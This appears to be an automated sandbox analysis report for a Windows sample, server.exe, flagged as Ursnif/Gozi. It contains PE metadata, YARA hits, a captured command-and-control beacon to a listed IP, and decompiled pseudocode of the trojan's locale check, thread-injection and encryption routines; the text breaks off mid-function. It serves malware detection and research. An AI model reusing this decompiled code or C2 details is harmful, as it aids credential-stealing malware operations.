            cmp esi, dword ptr [02AE8870h]
            jnbe 00007FBBDCB53AE4h
            push 00000004h
            call 00007FBBDCB55E70h
            pop ecx
            and dword ptr [ebp+00h], 00000000h
            Programming Language:
            • [C++] VS2008 build 21022
            • [ASM] VS2008 build 21022
            • [ C ] VS2008 build 21022
            • [IMP] VS2005 build 50727
            • [RES] VS2008 build 21022
            • [LNK] VS2008 build 21022
            NameVirtual AddressVirtual Size Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IMPORT0xf14c0x64.text
            IMAGE_DIRECTORY_ENTRY_RESOURCE0x26e90000x1f6e8.rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
            IMAGE_DIRECTORY_ENTRY_BASERELOC0x27090000xa40.reloc
            IMAGE_DIRECTORY_ENTRY_DEBUG0x11c00x1c.text
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2d980x40.text
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IAT0x10000x184.text
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
            NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
            .text0x10000xea340xec00False0.5837526483050848data6.736125354250025IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            .data0x100000x26d89c80x17400unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
            .rsrc0x26e90000x1f6e80x1f800False0.4157831101190476data4.733170034701941IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
            .reloc0x27090000x78fc0x7a00False0.0759157274590164data0.9356665533967813IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
            NameRVASizeTypeLanguageCountry
            AFX_DIALOG_LAYOUT0x2704e080x2data
            AFX_DIALOG_LAYOUT0x2704df00xedata
            AFX_DIALOG_LAYOUT0x2704e000x2data
            JOSEFUZITILEP0x27034a80x18d4ASCII text, with very long lines (6356), with no line terminatorsSerbianItaly
            MOXUCAKOSAMIZIJAYIG0x2702cd00x7d1ASCII text, with very long lines (2001), with no line terminatorsSerbianItaly
            RT_CURSOR0x2704e100x330Device independent bitmap graphic, 48 x 96 x 1, image size 0
            RT_CURSOR0x27051400x130Device independent bitmap graphic, 32 x 64 x 1, image size 0
            RT_CURSOR0x27052980xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0
            RT_CURSOR0x27061400x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0
            RT_CURSOR0x27069e80x568Device independent bitmap graphic, 16 x 32 x 8, image size 0
            RT_CURSOR0x2706f800x130Device independent bitmap graphic, 32 x 64 x 1, image size 0
            RT_CURSOR0x27070b00xb0Device independent bitmap graphic, 16 x 32 x 1, image size 0
            RT_ICON0x26e9c600xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0SerbianItaly
            RT_ICON0x26eab080x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0SerbianItaly
            RT_ICON0x26eb3b00x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0SerbianItaly
            RT_ICON0x26eba780x568Device independent bitmap graphic, 16 x 32 x 8, image size 0SerbianItaly
            RT_ICON0x26ebfe00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0SerbianItaly
            RT_ICON0x26ee5880x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0SerbianItaly
            RT_ICON0x26ef6300x468Device independent bitmap graphic, 16 x 32 x 32, image size 0SerbianItaly
            RT_ICON0x26efb000xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsSerbianItaly
            RT_ICON0x26f09a80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsSerbianItaly
            RT_ICON0x26f12500x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsSerbianItaly
            RT_ICON0x26f19180x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsSerbianItaly
            RT_ICON0x26f1e800x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216SerbianItaly
            RT_ICON0x26f44280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096SerbianItaly
            RT_ICON0x26f54d00x988Device independent bitmap graphic, 24 x 48 x 32, image size 2304SerbianItaly
            RT_ICON0x26f5e580x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024SerbianItaly
            RT_ICON0x26f63380xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0SerbianItaly
            RT_ICON0x26f71e00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0SerbianItaly
            RT_ICON0x26f7a880x568Device independent bitmap graphic, 16 x 32 x 8, image size 0SerbianItaly
            RT_ICON0x26f7ff00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0SerbianItaly
            RT_ICON0x26fa5980x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0SerbianItaly
            RT_ICON0x26fb6400x988Device independent bitmap graphic, 24 x 48 x 32, image size 0SerbianItaly
            RT_ICON0x26fbfc80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0SerbianItaly
            RT_ICON0x26fc4980xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0SerbianItaly
            RT_ICON0x26fd3400x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0SerbianItaly
            RT_ICON0x26fdbe80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0SerbianItaly
            RT_ICON0x26fe2b00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0SerbianItaly
            RT_ICON0x26fe8180x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0SerbianItaly
            RT_ICON0x2700dc00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0SerbianItaly
            RT_ICON0x2701e680x988Device independent bitmap graphic, 24 x 48 x 32, image size 0SerbianItaly
            RT_ICON0x27027f00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0SerbianItaly
            RT_STRING0x27073800x2bedata
            RT_STRING0x27076400x492data
            RT_STRING0x2707ad80x5c6data
            RT_STRING0x27080a00x118data
            RT_STRING0x27081b80x52adata
            RT_ACCELERATOR0x2704d800x48dataSerbianItaly
            RT_ACCELERATOR0x2704dc80x18dataSerbianItaly
            RT_GROUP_CURSOR0x27052700x22data
            RT_GROUP_CURSOR0x2706f500x30data
            RT_GROUP_CURSOR0x27071600x22data
            RT_GROUP_ICON0x26fc4300x68dataSerbianItaly
            RT_GROUP_ICON0x26efa980x68dataSerbianItaly
            RT_GROUP_ICON0x26f62c00x76dataSerbianItaly
            RT_GROUP_ICON0x2702c580x76dataSerbianItaly
            RT_VERSION0x27071880x1f8data
            None0x2704de00xadata
            DLLImport
            KERNEL32.dllCreateHardLinkA, CallNamedPipeW, GetCommConfig, GetConsoleAliasesA, GetWindowsDirectoryA, FindResourceExA, GlobalAlloc, LoadLibraryW, CreateEventA, GetConsoleAliasExesLengthW, GetStringTypeExW, GetExitCodeProcess, lstrcpynW, EnumSystemCodePagesA, GetFileAttributesW, LocalReAlloc, WriteConsoleW, GetBinaryTypeA, MultiByteToWideChar, SetLastError, FindCloseChangeNotification, VirtualAlloc, GetFileType, WriteProfileSectionW, FreeEnvironmentStringsW, GetPrivateProfileSectionA, GetStringTypeW, EnumDateFormatsW, FindAtomW, DeleteTimerQueueTimer, GlobalAddAtomW, OpenFileMappingA, LCMapStringW, OpenJobObjectA, GetProcAddress, GetStartupInfoW, HeapAlloc, GetLastError, HeapFree, GetModuleHandleW, TlsGetValue, TlsAlloc, TlsSetValue, TlsFree, InterlockedIncrement, GetCurrentThreadId, InterlockedDecrement, Sleep, HeapSize, ExitProcess, SetUnhandledExceptionFilter, WriteFile, GetStdHandle, GetModuleFileNameA, GetModuleFileNameW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetStartupInfoA, DeleteCriticalSection, HeapCreate, VirtualFree, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, TerminateProcess, GetCurrentProcess, UnhandledExceptionFilter, IsDebuggerPresent, LeaveCriticalSection, EnterCriticalSection, HeapReAlloc, RaiseException, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, LoadLibraryA, InitializeCriticalSectionAndSpinCount, RtlUnwind, GetModuleHandleA, LCMapStringA, WideCharToMultiByte, GetStringTypeA, GetLocaleInfoA
            USER32.dllNotifyWinEvent, LoadMenuW, GetMenuInfo, ValidateRect, ArrangeIconicWindows
            GDI32.dllGetGlyphIndicesA
            ADVAPI32.dllMapGenericMask
            Language of compilation systemCountry where language is spokenMap
            SerbianItaly
            TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
            192.168.2.45.44.43.1749695802033203 03/15/23-14:40:37.858863TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4969580192.168.2.45.44.43.17
            TimestampSource PortDest PortSource IPDest IP
            Mar 15, 2023 14:40:37.787641048 CET4969580192.168.2.45.44.43.17
            Mar 15, 2023 14:40:37.841355085 CET80496955.44.43.17192.168.2.4
            Mar 15, 2023 14:40:37.841609001 CET4969580192.168.2.45.44.43.17
            Mar 15, 2023 14:40:37.858863115 CET4969580192.168.2.45.44.43.17
            Mar 15, 2023 14:40:37.912709951 CET80496955.44.43.17192.168.2.4
            Mar 15, 2023 14:40:37.913563967 CET80496955.44.43.17192.168.2.4
            Mar 15, 2023 14:40:37.913654089 CET4969580192.168.2.45.44.43.17
            Mar 15, 2023 14:40:37.926760912 CET4969580192.168.2.45.44.43.17
            Mar 15, 2023 14:40:37.980429888 CET80496955.44.43.17192.168.2.4
            Mar 15, 2023 14:40:57.963377953 CET4969680192.168.2.431.41.44.108
            Mar 15, 2023 14:41:00.968698025 CET4969680192.168.2.431.41.44.108
            Mar 15, 2023 14:41:06.971541882 CET4969680192.168.2.431.41.44.108
            TimestampSource PortDest PortSource IPDest IP
            Mar 15, 2023 14:39:17.005433083 CET5657253192.168.2.48.8.8.8
            Mar 15, 2023 14:39:17.028251886 CET53565728.8.8.8192.168.2.4
            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
            Mar 15, 2023 14:39:17.005433083 CET192.168.2.48.8.8.80xa670Standard query (0)checklist.skype.comA (IP address)IN (0x0001)false
            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
            Mar 15, 2023 14:39:17.028251886 CET8.8.8.8192.168.2.40xa670Name error (3)checklist.skype.comnonenoneA (IP address)IN (0x0001)false
            • 5.44.43.17
            Session IDSource IPSource PortDestination IPDestination PortProcess
            0192.168.2.4496955.44.43.1780C:\Users\user\Desktop\server.exe
            TimestampkBytes transferredDirectionData
            Mar 15, 2023 14:40:37.858863115 CET93OUTGET /drew/4g9Pq9f8yl_2BqLNg_2F/GsF66vmh2Tpicwg37xs/IeFtLuJ4Vgq9WwijsD2n0d/Bquuj0kLXj_2B/g9_2Bh6q/18_2Bd4Y19mjSIvebXNvx4u/IKPQjubsH_/2BffqZNZA6lqyycQo/1wN43eb54EKC/UkUZJXRrn4j/R3115Fw4Czb8SK/xar7XimyyrkEE9m9c0UP0/1KSNpQlordpxo1Ws/_2B6QH8tLTSTNrP/6dO_2BuUeu5EmaGfZI/wcja66YPQ/Z_2B4nfOuMl7_2BnQaBq/8KUwwwam.jlk HTTP/1.1
            User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
            Host: 5.44.43.17
            Connection: Keep-Alive
            Cache-Control: no-cache


            Click to jump to process

            Click to jump to process

            Target ID:0
            Start time:14:39:04
            Start date:15/03/2023
            Path:C:\Users\user\Desktop\server.exe
            Wow64 process (32bit):true
            Commandline:C:\Users\user\Desktop\server.exe
            Imagebase:0x400000
            File size:316928 bytes
            MD5 hash:768928D17E8D3489407B540DBAD4A770
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Yara matches:
            • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.568856386.0000000002E48000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.459546153.0000000005258000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.459546153.0000000005258000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.459546153.0000000005258000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.568965498.0000000005258000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000002.568965498.0000000005258000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000002.568965498.0000000005258000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.460026895.0000000005258000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.460026895.0000000005258000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.460026895.0000000005258000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.459923049.0000000005258000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.459923049.0000000005258000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.459923049.0000000005258000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.568790164.0000000002C80000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.459750539.0000000005258000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.459750539.0000000005258000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.459750539.0000000005258000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.459944740.0000000005258000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.459944740.0000000005258000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.459944740.0000000005258000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.459896893.0000000005258000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.459896893.0000000005258000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.459896893.0000000005258000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.459783978.0000000005258000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.459783978.0000000005258000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.459783978.0000000005258000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.460044843.0000000005258000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
            • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.460044843.0000000005258000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.460044843.0000000005258000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
            Reputation:low

            Reset < >

              Control-flow Graph

              C-Code - Quality: 85%
              			E004019F1() {
              				long _v8;
              				char _v12;
              				char _v16;
              				void* _v40;
              				long _t28;
              				long _t30;
              				long _t31;
              				signed short _t33;
              				void* _t37;
              				long _t40;
              				long _t41;
              				void* _t48;
              				intOrPtr _t50;
              				signed int _t57;
              				signed int _t58;
              				long _t63;
              				long _t65;
              				intOrPtr _t66;
              				void* _t71;
              				void* _t75;
              				signed int _t77;
              				signed int _t78;
              				void* _t82;
              				intOrPtr* _t83;
              
              				_t28 = E00401D68();
              				_v8 = _t28;
              				if(_t28 != 0) {
              					return _t28;
              				}
              				do {
              					_t77 = 0;
              					_v12 = 0;
              					_t63 = 0x30;
              					do {
              						_t71 = E004012E6(_t63);
              						if(_t71 == 0) {
              							_v8 = 8;
              						} else {
              							_t57 = NtQuerySystemInformation(8, _t71, _t63,  &_v12); // executed
              							_t67 = _t57;
              							_t58 = _t57 & 0x0000ffff;
              							_v8 = _t58;
              							if(_t58 == 4) {
              								_t63 = _t63 + 0x30;
              							}
              							_t78 = 0x13;
              							_t10 = _t67 + 1; // 0x1
              							_t77 =  *_t71 % _t78 + _t10;
              							E00401BA9(_t71);
              						}
              					} while (_v8 != 0);
              					_t30 = E00401688(_t77); // executed
              					_v8 = _t30;
              					Sleep(_t77 << 4); // executed
              					_t31 = _v8;
              				} while (_t31 == 0x15);
              				if(_t31 != 0) {
              					L30:
              					return _t31;
              				}
              				_v12 = 0;
              				_t33 = GetLocaleInfoA(0x400, 0x5a,  &_v12, 4); // executed
              				if(_t33 == 0) {
              					__imp__GetSystemDefaultUILanguage();
              					_t67 =  &_v12;
              					VerLanguageNameA(_t33 & 0xffff,  &_v12, 4);
              				}
              				if(_v12 == 0x5552) {
              					L28:
              					_t31 = _v8;
              					if(_t31 == 0xffffffff) {
              						_t31 = GetLastError();
              					}
              					goto L30;
              				} else {
              					if(E00401800(_t67,  &_v16) != 0) {
              						 *0x404178 = 0;
              						L20:
              						_t37 = CreateThread(0, 0, __imp__SleepEx,  *0x404180, 0, 0); // executed
              						_t82 = _t37;
              						if(_t82 == 0) {
              							L27:
              							_v8 = GetLastError();
              							goto L28;
              						}
              						_t40 = QueueUserAPC(E0040139F, _t82,  &_v40); // executed
              						if(_t40 == 0) {
              							_t65 = GetLastError();
              							TerminateThread(_t82, _t65);
              							CloseHandle(_t82);
              							_t82 = 0;
              							SetLastError(_t65);
              						}
              						if(_t82 == 0) {
              							goto L27;
              						} else {
              							_t41 = WaitForSingleObject(_t82, 0xffffffff);
              							_v8 = _t41;
              							if(_t41 == 0) {
              								GetExitCodeThread(_t82,  &_v8);
              							}
              							CloseHandle(_t82);
              							goto L28;
              						}
              					}
              					_t66 = _v16;
              					_t83 = __imp__GetLongPathNameW;
              					_t48 =  *_t83(_t66, 0, 0); // executed
              					_t75 = _t48;
              					if(_t75 == 0) {
              						L18:
              						 *0x404178 = _t66;
              						goto L20;
              					}
              					_t22 = _t75 + 2; // 0x2
              					_t50 = E004012E6(_t75 + _t22);
              					 *0x404178 = _t50;
              					if(_t50 == 0) {
              						goto L18;
              					}
              					 *_t83(_t66, _t50, _t75); // executed
              					E00401BA9(_t66);
              					goto L20;
              				}
              			}



























              0x004019f7
              0x004019fc
              0x00401a01
              0x00401ba8
              0x00401ba8
              0x00401a0a
              0x00401a0a
              0x00401a0e
              0x00401a11
              0x00401a12
              0x00401a18
              0x00401a1c
              0x00401a53
              0x00401a1e
              0x00401a26
              0x00401a2c
              0x00401a2e
              0x00401a33
              0x00401a39
              0x00401a3b
              0x00401a3b
              0x00401a42
              0x00401a48
              0x00401a48
              0x00401a4c
              0x00401a4c
              0x00401a5a
              0x00401a61
              0x00401a6a
              0x00401a6d
              0x00401a73
              0x00401a76
              0x00401a7f
              0x00401ba4
              0x00000000
              0x00401ba6
              0x00401a92
              0x00401a95
              0x00401a9d
              0x00401a9f
              0x00401aaa
              0x00401ab2
              0x00401ab2
              0x00401ac0
              0x00401b96
              0x00401b96
              0x00401b9c
              0x00401b9e
              0x00401b9e
              0x00000000
              0x00401ac6
              0x00401ad1
              0x00401b0f
              0x00401b15
              0x00401b27
              0x00401b2d
              0x00401b31
              0x00401b8d
              0x00401b93
              0x00000000
              0x00401b93
              0x00401b3d
              0x00401b4b
              0x00401b53
              0x00401b57
              0x00401b5e
              0x00401b61
              0x00401b63
              0x00401b63
              0x00401b6b
              0x00000000
              0x00401b6d
              0x00401b70
              0x00401b76
              0x00401b7b
              0x00401b82
              0x00401b82
              0x00401b89
              0x00000000
              0x00401b89
              0x00401b6b
              0x00401ad3
              0x00401ad8
              0x00401adf
              0x00401ae1
              0x00401ae5
              0x00401b07
              0x00401b07
              0x00000000
              0x00401b07
              0x00401ae7
              0x00401aec
              0x00401af1
              0x00401af8
              0x00000000
              0x00000000
              0x00401afd
              0x00401b00
              0x00000000
              0x00401b00

              APIs
                • Part of subcall function 00401D68: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,004019FC), ref: 00401D77
                • Part of subcall function 00401D68: GetVersion.KERNEL32 ref: 00401D86
                • Part of subcall function 00401D68: GetCurrentProcessId.KERNEL32 ref: 00401DA2
                • Part of subcall function 00401D68: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401DBB
                • Part of subcall function 004012E6: RtlAllocateHeap.NTDLL(00000000,?,00401A18,00000030,?,00000000), ref: 004012F2
              • NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 00401A26
              • Sleep.KERNELBASE(00000000,00000000,00000030,?,00000000), ref: 00401A6D
              • GetLocaleInfoA.KERNELBASE(00000400,0000005A,?,00000004,?,00000000), ref: 00401A95
              • GetSystemDefaultUILanguage.KERNEL32(?,00000000), ref: 00401A9F
              • VerLanguageNameA.KERNEL32(?,?,00000004,?,00000000), ref: 00401AB2
              • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401ADF
              • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401AFD
              • CreateThread.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000), ref: 00401B27
              • QueueUserAPC.KERNELBASE(0040139F,00000000,?,?,00000000), ref: 00401B3D
              • GetLastError.KERNEL32(?,00000000), ref: 00401B4D
              • TerminateThread.KERNEL32(00000000,00000000,?,00000000), ref: 00401B57
              • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00401B5E
              • SetLastError.KERNEL32(00000000,?,00000000), ref: 00401B63
              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00401B70
              • GetExitCodeThread.KERNEL32(00000000,00000000,?,00000000), ref: 00401B82
              • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00401B89
              • GetLastError.KERNEL32(?,00000000), ref: 00401B8D
              • GetLastError.KERNEL32(?,00000000), ref: 00401B9E
              Memory Dump Source
              • Source File: 00000000.00000002.568497701.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000000.00000002.568497701.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.568497701.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000000.00000002.568497701.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_400000_server.jbxd
              Similarity
              • API ID: ErrorLast$NameThread$CloseCreateHandleLanguageLongPathProcessSystem$AllocateCodeCurrentDefaultEventExitHeapInfoInformationLocaleObjectOpenQueryQueueSingleSleepTerminateUserVersionWait
              • String ID:
              • API String ID: 3475612337-0
              • Opcode ID: 63886129df23de6e3ef072691f354a937fc67659b51f8fa83a58e9985e998f06
              • Instruction ID: e4abbca9115d716754b6864e37b0832fe911a2439c52af45cdd796d0275508de
              • Opcode Fuzzy Hash: 63886129df23de6e3ef072691f354a937fc67659b51f8fa83a58e9985e998f06
              • Instruction Fuzzy Hash: 4E519E71901214ABE721AFA59D48EAFBA7CAB45755F104177F901F32A0EB389A40CB68
              Uniqueness

              Uniqueness Score: -1.00%

              Control-flow Graph

              • Executed
              • Not Executed
              control_flow_graph 113 2ce1508-2ce1548 CryptAcquireContextW 114 2ce154e-2ce158a memcpy CryptImportKey 113->114 115 2ce169f-2ce16a5 113->115 116 2ce168a-2ce1690 114->116 117 2ce1590-2ce15a2 CryptSetKeyParam 114->117 123 2ce16a8-2ce16af 115->123 128 2ce1693-2ce169d CryptReleaseContext 116->128 118 2ce15a8-2ce15b1 117->118 119 2ce1676-2ce167c 117->119 121 2ce15b9-2ce15c6 call 2ce33dc 118->121 122 2ce15b3-2ce15b5 118->122 130 2ce167f-2ce1688 CryptDestroyKey 119->130 131 2ce15cc-2ce15d5 121->131 132 2ce166d-2ce1674 121->132 122->121 125 2ce15b7 122->125 125->121 128->123 130->128 133 2ce15d8-2ce15e0 131->133 132->130 134 2ce15e5-2ce1602 memcpy 133->134 135 2ce15e2 133->135 136 2ce161d-2ce1629 134->136 137 2ce1604-2ce161b CryptEncrypt 134->137 135->134 138 2ce1632-2ce1634 136->138 137->138 139 2ce1636-2ce1640 138->139 140 2ce1644-2ce164f 138->140 139->133 141 2ce1642 139->141 142 2ce1651-2ce1661 140->142 144 2ce1663-2ce166b call 2ce61da 140->144 141->142 142->130 144->130
              C-Code - Quality: 50%
              			E02CE1508(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
              				int _v8;
              				long* _v12;
              				int _v16;
              				void* _v20;
              				long* _v24;
              				void* _v39;
              				char _v40;
              				void _v56;
              				int _v60;
              				intOrPtr _v64;
              				void _v67;
              				char _v68;
              				void* _t61;
              				int _t68;
              				signed int _t76;
              				int _t79;
              				int _t81;
              				void* _t85;
              				long _t86;
              				int _t90;
              				signed int _t94;
              				int _t101;
              				void* _t102;
              				int _t103;
              				void* _t104;
              				void* _t105;
              				void* _t106;
              
              				_t103 = __eax;
              				_t94 = 6;
              				_v68 = 0;
              				memset( &_v67, 0, _t94 << 2);
              				_t105 = _t104 + 0xc;
              				asm("stosw");
              				asm("stosb");
              				_v40 = 0;
              				asm("stosd");
              				asm("stosd");
              				asm("stosd");
              				asm("stosw");
              				asm("stosb");
              				_t61 =  *0x2cea0e8( &_v24, 0, 0, 0x18, 0xf0000000); // executed
              				if(_t61 == 0) {
              					_a8 = GetLastError();
              				} else {
              					_t101 = 0x10;
              					memcpy( &_v56, _a8, _t101);
              					_t106 = _t105 + 0xc;
              					_v60 = _t101;
              					_v67 = 2;
              					_v64 = 0x660e;
              					_v68 = 8;
              					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed
              					if(_t68 == 0) {
              						_a8 = GetLastError();
              					} else {
              						_push(0);
              						_push( &_v40);
              						_push(1);
              						_push(_v12);
              						if( *0x2cea0e4() == 0) {
              							_a8 = GetLastError();
              						} else {
              							_t18 = _t103 + 0xf; // 0x10
              							_t76 = _t18 & 0xfffffff0;
              							if(_a4 != 0 && _t76 == _t103) {
              								_t76 = _t76 + _t101;
              							}
              							_t102 = E02CE33DC(_t76);
              							_v20 = _t102;
              							if(_t102 == 0) {
              								_a8 = 8;
              							} else {
              								_v16 = 0;
              								_a8 = 0;
              								while(1) {
              									_t79 = 0x10;
              									_v8 = _t79;
              									if(_t103 <= _t79) {
              										_v8 = _t103;
              									}
              									memcpy(_t102, _a12, _v8);
              									_t81 = _v8;
              									_a12 = _a12 + _t81;
              									_t103 = _t103 - _t81;
              									_t106 = _t106 + 0xc;
              									if(_a4 == 0) {
              										_t85 =  *0x2cea0a8(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8);
              									} else {
              										_t85 =  *0x2cea0c0(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20);
              									}
              									if(_t85 == 0) {
              										break;
              									}
              									_t90 = _v8;
              									_v16 = _v16 + _t90;
              									_t102 = _t102 + _t90;
              									if(_t103 != 0) {
              										continue;
              									} else {
              										L17:
              										 *_a16 = _v20;
              										 *_a20 = _v16;
              									}
              									goto L21;
              								}
              								_t86 = GetLastError();
              								_a8 = _t86;
              								if(_t86 != 0) {
